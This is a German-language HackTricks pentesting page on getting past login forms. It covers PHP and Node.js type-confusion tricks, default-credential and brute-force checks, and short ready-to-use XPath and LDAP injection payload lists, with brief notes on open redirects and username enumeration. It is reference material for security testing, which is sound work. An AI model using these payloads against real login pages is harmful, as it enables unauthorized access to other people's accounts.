Login Bypass

Lerne & übe AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lerne & übe GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Unterstütze HackTricks

RootedCON ist die relevanteste Cybersecurity-Veranstaltung in Spanien und eine der wichtigsten in Europa. Mit der Mission, technisches Wissen zu fördern, ist dieser Kongress ein brodelnder Treffpunkt für Technologie- und Cybersecurity-Profis in jeder Disziplin.

Umgehung des regulären Logins

Wenn du eine Login-Seite findest, kannst du hier einige Techniken finden, um zu versuchen, sie zu umgehen:

  • Überprüfe auf Kommentare innerhalb der Seite (nach unten und nach rechts scrollen?)

  • Überprüfe, ob du direkt auf die eingeschränkten Seiten zugreifen kannst

  • Überprüfe, ob du die Parameter nicht sendest (keine oder nur 1 senden)

  • Überprüfe den PHP-Vergleichsfehler: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b

  • Ändere den Inhaltstyp auf json und sende json-Werte (bool true eingeschlossen)

  • Wenn du eine Antwort erhältst, die besagt, dass POST nicht unterstützt wird, kannst du versuchen, das JSON im Body, aber mit einer GET-Anfrage mit Content-Type: application/json zu senden

  • Überprüfe den möglichen Parsing-Fehler von Nodejs (lies dies): password[password]=1

  • Nodejs wird diese Payload in eine Abfrage umwandeln, die der folgenden ähnelt: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; was dazu führt, dass das Passwort immer wahr ist.

  • Wenn du ein JSON-Objekt senden kannst, kannst du "password":{"password": 1} senden, um den Login zu umgehen.

  • Denk daran, dass du, um diesen Login zu umgehen, immer einen gültigen Benutzernamen kennen und senden musst.

  • Hinzufügen der Option "stringifyObjects":true beim Aufruf von mysql.createConnection wird schließlich alle unerwarteten Verhaltensweisen blockieren, wenn Object im Parameter übergeben wird.

  • Überprüfe die Anmeldedaten:

  • Standardanmeldedaten der verwendeten Technologie/Plattform

  • Häufige Kombinationen (root, admin, password, Name der Technologie, Standardbenutzer mit einem dieser Passwörter).

  • Erstelle ein Wörterbuch mit Cewl, füge den Standard Benutzernamen und das Passwort (falls vorhanden) hinzu und versuche, es mit allen Wörtern als Benutzernamen und Passwort zu brute-forcen.

  • Brute-Force mit einem größeren Wörterbuch (Brute force)

SQL Injection Authentifizierungsumgehung

Hier findest du mehrere Tricks, um den Login über SQL-Injektionen zu umgehen.

Auf der folgenden Seite findest du eine benutzerdefinierte Liste, um zu versuchen, den Login über SQL-Injektionen zu umgehen:

Login bypass List

Keine SQL Injection Authentifizierungsumgehung

Hier findest du mehrere Tricks, um den Login über Keine SQL-Injektionen zu umgehen.

Da die NoSQL-Injektionen erfordern, dass die Parameterwerte geändert werden, musst du sie manuell testen.

XPath Injection Authentifizierungsumgehung

Hier findest du mehrere Tricks, um den Login über XPath Injection zu umgehen.

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

LDAP Injection Authentifizierungsumgehung

Hier finden Sie mehrere Tricks, um die Anmeldung über LDAP Injection zu umgehen.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Remember Me

Wenn die Seite eine "Remember Me" Funktionalität hat, überprüfe, wie sie implementiert ist und sieh nach, ob du sie missbrauchen kannst, um andere Konten zu übernehmen.

Redirects

Seiten leiten Benutzer normalerweise nach dem Login um, überprüfe, ob du diese Umleitung ändern kannst, um einen Open Redirect zu verursachen. Vielleicht kannst du einige Informationen (Codes, Cookies...) stehlen, wenn du den Benutzer auf deine Webseite umleitest.

Other Checks

  • Überprüfe, ob du Benutzernamen enumerieren kannst, indem du die Login-Funktionalität missbrauchst.

  • Überprüfe, ob Auto-Complete in den Passwort/sensiblen Informationen Formularen eingeschaltet ist: <input autocomplete="false"

​​RootedCON ist die relevanteste Cybersecurity-Veranstaltung in Spanien und eine der wichtigsten in Europa. Mit der Mission, technisches Wissen zu fördern, ist dieser Kongress ein brodelnder Treffpunkt für Technologie- und Cybersecurity-Profis in jeder Disziplin.

Lerne & übe AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lerne & übe GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Last updated